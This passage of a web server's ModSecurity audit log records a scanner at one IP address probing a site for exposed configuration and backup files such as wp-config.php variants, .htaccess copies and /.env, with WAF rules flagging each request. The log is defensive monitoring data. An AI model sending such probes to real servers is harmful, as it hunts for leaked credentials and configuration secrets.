Engine-Mode: "DETECTION_ONLY" --0591fa29-Z-- --b9b7e65d-A-- [17/Jun/2025:00:34:06.767209 +0530] aFBqplJfblPUQiSn5r1hQAAAAAA 185.177.72.201 46494 127.0.0.1 7080 --b9b7e65d-B-- GET /_.htaccess HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b9b7e65d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b9b7e65d-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/_.htaccess"] [unique_id "aFBqplJfblPUQiSn5r1hQAAAAAA"] Stopwatch: 1750100646764202 3061 (- - -) Stopwatch2: 1750100646764202 3061; combined=1738, p1=441, p2=1241, p3=0, p4=0, p5=56, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9b7e65d-Z-- --21fc9a31-A-- [17/Jun/2025:00:34:07.099333 +0530] aFBqp33hoSwVUy254pHz5AAAACQ 185.177.72.201 46526 127.0.0.1 7080 --21fc9a31-B-- GET /index.html.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --21fc9a31-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --21fc9a31-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".html.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".html.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/index.html.old"] [unique_id "aFBqp33hoSwVUy254pHz5AAAACQ"] Stopwatch: 1750100647095697 3716 (- - -) Stopwatch2: 1750100647095697 3716; combined=2201, p1=359, p2=1758, p3=0, p4=0, p5=84, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21fc9a31-Z-- --2e765930-A-- [17/Jun/2025:00:34:07.325366 +0530] aFBqpxwcFb_n1P0IC9xk-AAAAAo 185.177.72.201 46558 127.0.0.1 7080 --2e765930-B-- GET /wp-config.php.cust HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2e765930-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2e765930-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.cust"] [unique_id "aFBqpxwcFb_n1P0IC9xk-AAAAAo"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.cust' not found or unable to stat Stopwatch: 1750100647322548 2874 (- - -) Stopwatch2: 1750100647322548 2874; combined=1705, p1=317, p2=1327, p3=0, p4=0, p5=61, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2e765930-Z-- --13f05753-A-- [17/Jun/2025:00:34:07.544506 +0530] aFBqp5VkCcfT-Z8NQYyUfwAAAAc 185.177.72.201 46582 127.0.0.1 7080 --13f05753-B-- GET /.htaccess.tmp HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --13f05753-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --13f05753-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.tmp"] [unique_id "aFBqp5VkCcfT-Z8NQYyUfwAAAAc"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.tmp Stopwatch: 1750100647543619 949 (- - -) Stopwatch2: 1750100647543619 949; combined=513, p1=413, p2=0, p3=0, p4=0, p5=100, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13f05753-Z-- --17c7a634-A-- [17/Jun/2025:00:34:07.877312 +0530] aFBqp38PxMRZ7s11niQJjQAAAAI 185.177.72.201 46626 127.0.0.1 7080 --17c7a634-B-- GET /app.config HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --17c7a634-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --17c7a634-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/app.config"] [unique_id "aFBqp38PxMRZ7s11niQJjQAAAAI"] Stopwatch: 1750100647874123 3244 (- - -) Stopwatch2: 1750100647874123 3244; combined=1932, p1=326, p2=1545, p3=0, p4=0, p5=61, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --17c7a634-Z-- --f7106074-A-- [17/Jun/2025:00:34:08.542356 +0530] aFBqqH8PxMRZ7s11niQJjgAAAAI 185.177.72.201 46710 127.0.0.1 7080 --f7106074-B-- GET /index.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f7106074-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f7106074-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/index.php.bak"] [unique_id "aFBqqH8PxMRZ7s11niQJjgAAAAI"] Stopwatch: 1750100648538972 3450 (- - -) Stopwatch2: 1750100648538972 3450; combined=2018, p1=376, p2=1581, p3=0, p4=0, p5=61, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f7106074-Z-- --91cea94e-A-- [17/Jun/2025:00:34:08.985606 +0530] aFBqqH3hoSwVUy254pHz5wAAACQ 185.177.72.201 46748 127.0.0.1 7080 --91cea94e-B-- GET /wp-config.php_ HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --91cea94e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --91cea94e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_"] [unique_id "aFBqqH3hoSwVUy254pHz5wAAACQ"] Stopwatch: 1750100648982534 3126 (- - -) Stopwatch2: 1750100648982534 3126; combined=1873, p1=361, p2=1453, p3=0, p4=0, p5=59, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --91cea94e-Z-- --99fddc6a-A-- [17/Jun/2025:00:34:09.095953 +0530] aFBqqR6Azi2u_ik2Q3KoxwAAAAY 185.177.72.201 46752 127.0.0.1 7080 --99fddc6a-B-- GET /config.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --99fddc6a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --99fddc6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.php.old"] [unique_id "aFBqqR6Azi2u_ik2Q3KoxwAAAAY"] Stopwatch: 1750100649092960 3045 (- - -) Stopwatch2: 1750100649092960 3045; combined=1715, p1=349, p2=1310, p3=0, p4=0, p5=55, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99fddc6a-Z-- --acc0c538-A-- [17/Jun/2025:00:34:09.428311 +0530] aFBqqZlL5_2Zd8wUdfLIuQAAAAg 185.177.72.201 58230 127.0.0.1 7080 --acc0c538-B-- GET /config.properties.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --acc0c538-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --acc0c538-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.properties.bak"] [unique_id "aFBqqZlL5_2Zd8wUdfLIuQAAAAg"] Stopwatch: 1750100649425228 3180 (- - -) Stopwatch2: 1750100649425228 3180; combined=1844, p1=341, p2=1446, p3=0, p4=0, p5=57, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acc0c538-Z-- --d3a4750a-A-- [17/Jun/2025:00:34:09.650416 +0530] aFBqqY3q6eGJ2xNcTd6GfgAAAAU 185.177.72.201 58256 127.0.0.1 7080 --d3a4750a-B-- GET /robots.txt.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d3a4750a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d3a4750a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/robots.txt.backup"] [unique_id "aFBqqY3q6eGJ2xNcTd6GfgAAAAU"] Stopwatch: 1750100649646889 3589 (- - -) Stopwatch2: 1750100649646889 3589; combined=2098, p1=350, p2=1689, p3=0, p4=0, p5=59, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d3a4750a-Z-- --96852e79-A-- [17/Jun/2025:00:34:09.873499 +0530] aFBqqX8PxMRZ7s11niQJkAAAAAI 185.177.72.201 58270 127.0.0.1 7080 --96852e79-B-- GET /wp-config.php.inc HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --96852e79-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --96852e79-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.inc"] [unique_id "aFBqqX8PxMRZ7s11niQJkAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.inc"] [unique_id "aFBqqX8PxMRZ7s11niQJkAAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.inc' not found or unable to stat Stopwatch: 1750100649869732 3821 (- - -) Stopwatch2: 1750100649869732 3821; combined=2282, p1=448, p2=1745, p3=0, p4=0, p5=89, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96852e79-Z-- --4c51917b-A-- [17/Jun/2025:00:34:10.427505 +0530] aFBqqh6Azi2u_ik2Q3KoyQAAAAY 185.177.72.201 58338 127.0.0.1 7080 --4c51917b-B-- GET /robots.txt.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4c51917b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4c51917b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/robots.txt.bak"] [unique_id "aFBqqh6Azi2u_ik2Q3KoyQAAAAY"] Stopwatch: 1750100650423379 4205 (- - -) Stopwatch2: 1750100650423379 4205; combined=2458, p1=461, p2=1915, p3=0, p4=0, p5=82, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4c51917b-Z-- --d4242c39-A-- [17/Jun/2025:00:34:10.537859 +0530] aFBqqiid3pHxA3RhGpzp3wAAAAk 185.177.72.201 58362 127.0.0.1 7080 --d4242c39-B-- GET /v1/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d4242c39-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d4242c39-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/v1/.env"] [unique_id "aFBqqiid3pHxA3RhGpzp3wAAAAk"] Stopwatch: 1750100650534794 3119 (- - -) Stopwatch2: 1750100650534794 3119; combined=1819, p1=377, p2=1380, p3=0, p4=0, p5=62, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4242c39-Z-- --3f17550d-A-- [17/Jun/2025:00:34:10.760222 +0530] aFBqqlJfblPUQiSn5r1hRgAAAAA 185.177.72.201 58376 127.0.0.1 7080 --3f17550d-B-- GET /readme.md.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3f17550d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --3f17550d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".md.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".md.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/readme.md.old"] [unique_id "aFBqqlJfblPUQiSn5r1hRgAAAAA"] Stopwatch: 1750100650756685 3593 (- - -) Stopwatch2: 1750100650756685 3593; combined=2123, p1=363, p2=1693, p3=0, p4=0, p5=67, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f17550d-Z-- --fda9d72d-A-- [17/Jun/2025:00:34:10.872283 +0530] aFBqqplL5_2Zd8wUdfLIuwAAAAg 185.177.72.201 58386 127.0.0.1 7080 --fda9d72d-B-- GET /app/config/parameters.ini HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fda9d72d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fda9d72d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 